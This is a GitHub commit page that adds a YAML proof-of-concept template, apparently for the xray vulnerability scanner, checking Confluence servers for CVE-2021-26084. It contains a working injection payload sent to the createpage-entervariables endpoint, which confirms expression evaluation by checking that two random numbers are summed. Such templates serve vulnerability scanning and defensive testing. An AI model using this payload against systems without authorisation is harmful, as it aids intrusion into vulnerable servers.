Skip to content

Commit

Permalink
Create poc-yaml-confluence-cve-2021-26084.yml (chaitin#1403)
Browse files Browse the repository at this point in the history 
* Create poc-yaml-confluence-cve-2021-26084.yml

* Rename poc-yaml-confluence-cve-2021-26084.yml to confluence-cve-2021-26084.yml

* Update confluence-cve-2021-26084.yml

Co-authored-by: smile-jpg <[email protected]>
  • Loading branch information
@Loneyers @smile-jpg
Loneyers and smile-jpg authored Sep 14, 2021
1 parent 98ff3c5 commit bd3089f
Showing 1 changed file with 15 additions and 0 deletions.
15 changes: 15 additions & 0 deletions pocs/confluence-cve-2021-26084.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
name: poc-yaml-confluence-cve-2021-26084
set:
r1: randomInt(100000, 999999)
r2: randomInt(100000, 999999)
rules:
- method: POST
path: /pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: Loneyer(https://github.com/Loneyers)
links:
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

0 comments on commit bd3089f

Please sign in to comment.